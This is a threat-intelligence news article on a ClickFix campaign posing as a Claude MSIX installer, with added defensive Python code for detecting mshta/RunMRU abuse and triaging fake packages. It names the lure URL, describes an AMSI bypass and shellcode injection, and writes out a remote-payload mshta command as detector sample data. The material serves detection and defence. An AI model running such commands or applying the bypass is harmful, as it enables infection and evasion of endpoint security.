According to a new technical analysis from Rapid7, a sophisticated ClickFix campaign has been discovered masquerading as an installer for Claude, the popular AI assistant that has recently surged in public attention.
The campaign targets users in both the EU and the US, leveraging the hype surrounding AI tools to bypass traditional skepticism. As the report notes, “phishing campaigns utilizing various ClickFix techniques have been a commonly used method of social engineering… One of the main reasons for this is simply because they work”.
The attack chain begins with a deceptive URL, download-version[.]1-5-8[.]com/claude.msixbundle, which impersonates a legitimate Windows app package. MSIX is the standard package format for Windows apps, the kind of file users expect from the Microsoft Store, which makes the extension an effective lure for unsuspecting users.
Rapid7 SOC analysts were alerted when they observed the Windows mshta.exe utility executing a suspicious command. “MSIX files are… definitely not something you would see being passed as an argument to mshta,” the report explains. This unusual behavior triggered a detection rule for remote payload execution via the Windows Run dialog; the rule monitors the RunMRU registry key, where Windows records the commands a user types into Run.
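The two signals described above, mshta.exe receiving a remote URL or package path and a matching command landing in RunMRU, are easy to check in telemetry. The following is an added example written for this page, not Rapid7's detection rule or any code from the report: the event field names (`image`, `cmdline`), the sample events and the `download-version.example` domain are constructed for illustration, and the RunMRU layout assumed here is the documented one (values `a`, `b`, ... holding the typed command with a trailing `\1`, and `MRUList` ordering them most recent first).

```python
"""Flag mshta.exe launching remote payloads, and RunMRU entries showing that a
user pasted such a command into the Windows Run dialog.
Event field names and sample data are constructed for this example."""
import re
from typing import Dict, List

# A remote URL, or a Windows app-package extension, handed to mshta.exe.
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
PKG_RE = re.compile(r"\.(msix|msixbundle|appx|appxbundle)\b", re.IGNORECASE)
MSHTA_RE = re.compile(r"\bmshta(\.exe)?\b", re.IGNORECASE)


def check_process_event(event: Dict[str, str]) -> List[str]:
    """Return the reasons a process-creation event looks like ClickFix-style
    mshta abuse (empty list means nothing matched)."""
    reasons: List[str] = []
    image = event.get("image", "").lower()
    cmdline = event.get("cmdline", "")
    if image.endswith("mshta.exe"):
        if URL_RE.search(cmdline):
            reasons.append("mshta.exe launched with a remote URL argument")
        if PKG_RE.search(cmdline):
            reasons.append("mshta.exe handed a Windows app-package (.msix/.appx) path")
    return reasons


def parse_runmru(values: Dict[str, str]) -> List[str]:
    """Order RunMRU commands most recent first using MRUList and strip the
    trailing '\\1' that Windows appends to each stored command (assumed layout)."""
    entries: List[str] = []
    for key in values.get("MRUList", ""):
        raw = values.get(key)
        if raw is None:
            continue
        if raw.endswith("\\1"):
            raw = raw[:-2]
        entries.append(raw)
    return entries


def check_runmru(values: Dict[str, str]) -> List[str]:
    """Return RunMRU commands that pair mshta with a remote URL, i.e. a user
    was talked into running a remote payload from the Run dialog."""
    return [cmd for cmd in parse_runmru(values)
            if MSHTA_RE.search(cmd) and URL_RE.search(cmd)]


# Constructed sample telemetry (simplified Sysmon-like shape, assumed fields).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\mshta.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" https://download-version.example/claude.msixbundle'},
    {"image": r"C:\Windows\System32\mshta.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" C:\Tools\local_dashboard.hta'},
    {"image": r"C:\Windows\System32\notepad.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\System32\notepad.exe" https://intranet.example/notes.txt'},
]

# Constructed RunMRU values as read from HKCU\...\Explorer\RunMRU: 'b' is most recent.
SAMPLE_RUNMRU = {
    "MRUList": "ba",
    "a": "notepad\\1",
    "b": "mshta https://download-version.example/claude.msixbundle\\1",
}

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        for reason in check_process_event(ev):
            print(f"ALERT [{reason}] {ev['cmdline']}")
    for cmd in check_runmru(SAMPLE_RUNMRU):
        print(f"ALERT [RunMRU remote mshta] {cmd}")
```

Only the first process event fires (on both rules); the locally stored HTA in the second event and the unrelated URL in the third do not, which keeps the rule from paging on ordinary mshta or URL use. Pairing the process-creation hit with the RunMRU entry is what distinguishes a user who was socially engineered into typing the command from a script or installer that launched mshta itself.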
A closer look at the “Claude” payload revealed a complex, multi-stage infection process:
- The ZIP Wrapper: While the file mimicked an MSIX bundle, it was actually a ZIP archive containing a string reference to a Microsoft Bing package to bolster its legitimacy.
- Embedded HTA: Inside the archive sat an HTML Application (HTA) containing heavily obfuscated VBScript.
- PowerShell Staging: The VBScript’s primary role was to decode and execute a staging PowerShell command.
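The first two stages above come down to a structural mismatch: a file named like an MSIX bundle that is a ZIP container carrying an HTA rather than a package. A genuine .msixbundle is itself a ZIP, so the useful triage question is not "is it a ZIP" but "does it contain what a bundle contains, and does it contain things a bundle never should". The following is an added triage helper written for this page, not code from Rapid7 or the campaign: the manifest path `AppxMetadata/AppxBundleManifest.xml` is assumed to be where a real bundle keeps its manifest, and both samples are constructed in memory.

```python
"""Triage a file that claims to be an MSIX bundle: confirm it is a ZIP
container, check for the bundle manifest, and list any script members.
Manifest location is an assumption; both samples are constructed."""
import io
import zipfile
from typing import Dict, List

# Assumed location of the manifest inside a genuine .msixbundle / .appxbundle.
BUNDLE_MANIFEST = "AppxMetadata/AppxBundleManifest.xml"
# Script types that have no business inside an app package.
SCRIPT_EXTS = (".hta", ".vbs", ".vbe", ".js", ".jse", ".ps1", ".bat", ".cmd")
ZIP_LOCAL_HEADER = b"PK\x03\x04"


def triage_package(data: bytes) -> Dict[str, object]:
    """Return structural findings and a verdict for a claimed MSIX bundle."""
    result: Dict[str, object] = {
        "is_zip": False,
        "has_bundle_manifest": False,
        "script_members": [],
        "verdict": "not a ZIP container",
    }
    if not data.startswith(ZIP_LOCAL_HEADER):
        return result
    result["is_zip"] = True
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
    scripts: List[str] = [n for n in names if n.lower().endswith(SCRIPT_EXTS)]
    result["has_bundle_manifest"] = BUNDLE_MANIFEST in names
    result["script_members"] = scripts
    if scripts:
        result["verdict"] = "suspicious: script payload inside a package container"
    elif not result["has_bundle_manifest"]:
        result["verdict"] = "suspicious: ZIP container without a bundle manifest"
    else:
        result["verdict"] = "structurally consistent with an MSIX bundle"
    return result


def build_sample(members: Dict[str, bytes]) -> bytes:
    """Build an in-memory ZIP from a name->bytes mapping (constructed test data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed lure: a ZIP renamed .msixbundle that only carries an HTA stub.
LURE = build_sample({
    "claude_setup.hta": b"<html><script language=vbscript>' placeholder stub</script></html>",
})
# Constructed shape of a real bundle: manifest plus a nested package entry.
GENUINE_SHAPE = build_sample({
    BUNDLE_MANIFEST: b"<Bundle/>",
    "app_x64.msix": b"placeholder",
})

if __name__ == "__main__":
    for label, blob in (("lure", LURE), ("genuine-shape", GENUINE_SHAPE), ("exe", b"MZ\x90\x00")):
        print(label, triage_package(blob))
```

Run against a real sample this only reads the central directory, so it is safe to use on a quarantined file before anything is extracted; the `is_zip` flag alone is not evidence of anything, since real packages are ZIPs too, and it is the combination of a missing manifest and a script member that matches the lure described here.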
This staging payload is remarkably targeted. It generates an MD5 hash based on the victim’s specific computer name and username to craft a unique URL for the next stage of the attack.
To evade modern endpoint defenses, the attackers implemented a surgical AMSI (Antimalware Scan Interface) bypass. By using a custom deobfuscation routine, the script overwrites the amsiContext field within the .NET AmsiUtils library with a junk pointer (0x41414141), effectively blinding the system’s real-time scanning capabilities.
With the coast clear, the malware executes a ScriptBlock that performs a process injection routine. It resolves several low-level Windows API functions—including NtAllocateVirtualMemory, NtProtectVirtualMemory, and NtCreateThreadEx—to inject and run encrypted shellcode directly in memory, without writing a payload to disk.